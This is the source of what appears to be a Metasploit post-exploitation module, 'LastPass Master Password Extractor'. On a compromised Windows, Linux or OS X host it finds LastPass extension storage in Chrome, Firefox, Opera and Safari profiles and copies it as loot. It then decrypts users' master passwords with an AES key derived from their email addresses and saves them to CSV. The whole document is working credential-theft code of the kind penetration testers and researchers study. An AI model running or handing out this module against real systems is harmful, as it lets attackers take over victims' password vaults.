require 'msf/core'
require 'base64'
require 'openssl'
require 'sqlite3'
require 'uri'
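class Metasploit3 < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::OSX::System
  include Msf::Post::Unix

  # Query run against the Chrome/Opera/Safari extension databases. It has no
  # variable part, so a fixed string is fine here; never interpolate into it.
  LOGINS_QUERY = "SELECT username, password FROM LastPassSavedLogins2 " \
                 "WHERE username IS NOT NULL AND username != '' " \
                 "AND password IS NOT NULL AND password != '';".freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'LastPass Master Password Extractor',
        'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords',
        'License' => MSF_LICENSE,
        'Author' => [
          'Alberto Garcia Illera <agarciaillera[at]gmail.com>', # original module and research
          'Martin Vigo <martinvigo[at]gmail.com>', # original module and research
          'Jon Hart <jon_hart[at]rapid7.com>' # module rework and cleanup (closing '>' was missing)
        ],
        'Platform' => %w(linux osx unix win),
        'References' => [['URL', 'http://www.martinvigo.com/a-look-into-lastpass/']],
        'SessionTypes' => %w(meterpreter shell)
      )
    )
  end

  # Entry point: locates the LastPass storage of every browser/user on the
  # target, stores each file as loot, decrypts the master passwords and
  # reports them as a table and a CSV loot file.
  def run
    if session.platform =~ /win/ && session.type == "shell" # No Windows shell support
      print_error "Shell sessions on Windows are not supported"
      return
    end

    print_status "Searching for LastPass databases"
    account_map = build_account_map
    if account_map.empty?
      print_status "No databases found"
      return
    end

    # Count databases, not accounts: the map is { account => { browser => [paths] } }
    db_count = account_map.values.flat_map(&:values).map(&:size).reduce(0, :+)
    print_status "Extracting credentials from #{db_count} LastPass databases"

    # Each entry is [account, browser, LastPass username, encrypted password]
    credentials = []
    account_map.each_pair do |account, browser_map|
      browser_map.each_pair do |browser, paths|
        if browser == 'Firefox' # Firefox keeps the logins in prefs.js
          credentials.concat(firefox_loot_credentials(account, browser, paths))
        else # Chrome, Safari and Opera keep a SQLite extension database
          credentials.concat(sqlite_loot_credentials(account, browser, paths))
        end
      end
    end

    report_credentials(credentials)
  end

  # Stores each Firefox preferences file in +paths+ as loot and returns the
  # credential rows ([account, browser, username, encrypted password]) parsed
  # from the loot copies.
  def firefox_loot_credentials(account, browser, paths)
    paths.each_with_object([]) do |path, rows|
      data = read_file(path)
      loot_path = store_loot(
        'firefox.preferences',
        'text/javascript',
        session,
        data,
        nil,
        "Firefox preferences file #{path}"
      )

      # Both fields are URL-encoded inside prefs.js; DEFAULT_PARSER.unescape is
      # what URI.unescape delegates to and survives the latter's removal
      firefox_credentials(loot_path).each do |user, enc_pass|
        rows << [account, browser, URI::DEFAULT_PARSER.unescape(user), URI::DEFAULT_PARSER.unescape(enc_pass)]
      end
    end
  end

  # Stores each extension SQLite database in +paths+ as loot, queries the
  # saved logins of the loot copy and returns the credential rows. A database
  # that cannot be queried is reported and skipped so the remaining accounts
  # are still processed.
  def sqlite_loot_credentials(account, browser, paths)
    paths.each_with_object([]) do |path, rows|
      data = read_file(path)
      loot_path = store_loot(
        "#{browser.downcase}.lastpass.database",
        'application/x-sqlite3',
        session,
        data,
        nil,
        "#{account}'s #{browser} LastPass database #{path}"
      )

      saved_logins(loot_path).each do |lastpass_user, lastpass_pass|
        next unless lastpass_user && lastpass_pass
        rows << [account, browser, lastpass_user, lastpass_pass]
      end
    end
  end

  # Runs LOGINS_QUERY against the SQLite file at +loot_path+ and returns every
  # [username, password] row; the earlier code kept only the first row and
  # never closed the handle. SQLite errors (missing table, not a database)
  # are reported and yield [].
  def saved_logins(loot_path)
    db = SQLite3::Database.new(loot_path)
    begin
      db.execute(LOGINS_QUERY)
    rescue SQLite3::Exception => e
      print_error "Could not query #{loot_path}: #{e.message}"
      []
    ensure
      db.close
    end
  end

  # Decrypts every collected row, prints the result table and stores it as
  # CSV loot. Nothing is printed or stored when +credentials+ is empty.
  def report_credentials(credentials)
    return if credentials.empty?

    credentials_table = Rex::Ui::Text::Table.new(
      'Header' => "LastPass credentials",
      'Indent' => 1,
      'Columns' => %w(Account Browser LastPass_Username LastPass_Password)
    )

    credentials.each do |account, browser, user, enc_pass|
      vprint_status "Decrypting password for #{account}'s #{user} from #{browser}"
      credentials_table << [account, browser, user, clear_text_password(user, enc_pass)]
    end

    print_good credentials_table.to_s
    store_loot(
      "lastpass.creds",
      "text/csv",
      session,
      credentials_table.to_csv,
      nil,
      "Decrypted LastPass Master Passwords"
    )
  end

  # Returns a mapping of { Account => { Browser => [paths] } } holding only
  # the accounts and browsers for which at least one database was found, so
  # an empty result really means "nothing to extract" (previously every user
  # got an entry, which made the "No databases found" path unreachable).
  def build_account_map
    platform = session.platform
    profiles = user_profiles
    found_dbs_map = {}

    user_list = datastore['VERBOSE'] ? ": #{profiles.map { |p| p['UserName'] }.join(', ')}" : ""
    print_status "Found #{profiles.size} users#{user_list}"

    profiles.each do |user_profile|
      account = user_profile['UserName']
      browsers = {}
      candidate_paths(platform, user_profile).each_pair do |browser, path|
        db_paths = find_db_paths(path, browser, account)
        browsers[browser] = db_paths unless db_paths.empty?
      end
      found_dbs_map[account] = browsers unless browsers.empty?
    end

    found_dbs_map
  end

  # Returns the { Browser => directory } candidates for +user_profile+ on
  # +platform+: the locations where the LastPass browser extensions keep
  # their storage. An unrecognized platform is reported and yields {}.
  def candidate_paths(platform, user_profile)
    local = user_profile['LocalAppData']
    roaming = user_profile['AppData']

    case platform
    when /win/
      {
        'Chrome' => "#{local}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
        'Firefox' => "#{roaming}\\Mozilla\\Firefox\\Profiles",
        'Opera' => "#{roaming}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0",
        'Safari' => "#{local}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0"
      }
    when /unix|linux/
      {
        'Chrome' => "#{local}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
        'Firefox' => "#{local}/.mozilla/firefox"
      }
    when /osx/
      {
        'Chrome' => "#{local}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0",
        # POSIX separators: the earlier backslash form could never match a directory on OS X
        'Firefox' => "#{local}/Firefox/Profiles",
        'Opera' => "#{local}/com.operasoftware.Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0",
        'Safari' => "#{roaming}/Safari/Databases/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0"
      }
    else
      print_error "Platform not recognized: #{platform}"
      {}
    end
  end

  # Returns the list of LastPass database paths found under +path+ for
  # +browser+, reporting the count for +account+.
  def find_db_paths(path, browser, account)
    vprint_status "Checking #{account}'s #{browser}"

    paths = if browser == "Firefox" # Firefox: one prefs.js per profile directory
              firefox_profile_files(path, browser)
            else
              file_paths(path, browser, account)
            end
    paths = paths.uniq

    vprint_good "Found #{paths.size} #{browser} databases for #{account}"
    paths
  end

  # Returns the user profiles as hashes keyed by 'UserName', 'LocalAppData'
  # and (OS X and Windows) 'AppData'. Windows profiles come from the
  # UserProfiles mixin; Unix and OS X ones are derived from the home
  # directory listing.
  def user_profiles
    profiles = []

    case session.platform
    when /unix|linux/
      user_names = if session.type == "meterpreter"
                     client.fs.dir.entries("/home")
                   else
                     # split on whitespace: a home directory with a space in its
                     # name is reported as several users
                     session.shell_command("ls /home").split
                   end
      user_names.reject { |u| %w(. ..).include?(u) }.each do |user_name|
        profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}")
      end
    when /osx/
      user_names = session.shell_command("ls /Users").split
      user_names.reject { |u| u == 'Shared' }.each do |user_name|
        profiles.push(
          'UserName' => user_name,
          "AppData" => "/Users/#{user_name}/Library",
          "LocalAppData" => "/Users/#{user_name}/Library/Application Support"
        )
      end
    when /win/
      profiles |= grab_user_profiles
    else
      # the earlier message interpolated an undefined +os+, which raised NameError
      print_error "OS not recognized: #{session.platform}"
    end

    profiles
  end

  # Lists the entries of +path+ on the target without '.' and '..'. Returns
  # [] when +path+ is not a directory or the session type cannot list it.
  def directory_entries(path)
    return [] unless directory?(path)

    entries = case session.type
              when "meterpreter"
                client.fs.dir.entries(path)
              when "shell"
                # NOTE(review): +path+ is built from names read off the target and is
                # interpolated into a quoted command; an entry containing '"' breaks
                # the quoting and the listing for it fails silently
                session.shell_command("ls \"#{path}\"").split
              else
                print_error "Session type not recognized: #{session.type}"
                return []
              end

    entries.reject { |entry| %w(. ..).include?(entry) }
  end

  # Path separator of the target platform.
  def target_separator
    session.platform =~ /win/ ? '\\' : '/'
  end

  # Returns the database paths found directly under +path+ for +browser+,
  # ignoring '.', '..' and 'Shared'. +account+ is unused but kept for callers.
  def file_paths(path, browser, account)
    sep = target_separator
    directory_entries(path).reject { |entry| entry == 'Shared' }.map { |entry| [path, entry].join(sep) }
  end

  # Returns the prefs.js path of every Firefox profile directory under +path+
  # (profile directories carry ".default" in their name). +browser+ is unused
  # but kept for callers.
  def firefox_profile_files(path, browser)
    sep = target_separator
    directory_entries(path).select { |entry| entry =~ /\.default/ }.map { |entry| [path, entry, 'prefs.js'].join(sep) }
  end

  # Parses the Firefox preferences file at +loot_path+ and returns the
  # still-encoded [username, encrypted password] pairs found in the
  # extensions.lastpass.loginpws preference ("user=data|user=data|...").
  def firefox_credentials(loot_path)
    credentials = []

    File.foreach(loot_path) do |line|
      next unless /user_pref\("extensions.lastpass.loginpws", "(?<encoded_creds>.*)"\);/ =~ line

      encoded_creds.split("|").each do |user_creds|
        # Split on the first '=' only, so any '=' inside the encoded value
        # (base64 padding, for instance) stays with the password
        user, enc_pass = user_creds.split('=', 2)
        credentials << [user, enc_pass] unless enc_pass.nil? || enc_pass.empty?
      end
    end

    credentials
  end

  # Decrypts +encrypted_data+, the stored LastPass password for +email+, and
  # returns the clear text; returns nil when the data is blank or cannot be
  # decrypted. The AES-256 key is the SHA-256 digest of the e-mail address.
  # Data of the form "!<iv>|<ciphertext>" (both base64) is CBC; anything else
  # is treated as base64 ECB ciphertext.
  def clear_text_password(email, encrypted_data)
    return if encrypted_data.blank?

    key = OpenSSL::Digest::SHA256.digest(email) # binary digest, same as hexdigest + hex2bin

    if encrypted_data.include?("|") # CBC: '!' + 24 base64 chars of IV + '|' + ciphertext
      decipher = OpenSSL::Cipher.new("AES-256-CBC")
      decipher.decrypt
      decipher.key = key
      decipher.iv = Base64.decode64(encrypted_data[1, 24]) # skip the leading '!'
      encrypted_password = encrypted_data[26..-1] # skip the '|' after the IV
    else # ECB
      decipher = OpenSSL::Cipher.new("AES-256-ECB")
      decipher.decrypt
      decipher.key = key
      encrypted_password = encrypted_data
    end

    decipher.update(Base64.decode64(encrypted_password)) + decipher.final
  rescue => e
    # a padding error here usually means the key (e-mail) does not match the data
    print_error "Password for #{email} could not be decrypted"
    vprint_error "#{e.class}: #{e.message}"
    nil
  end
end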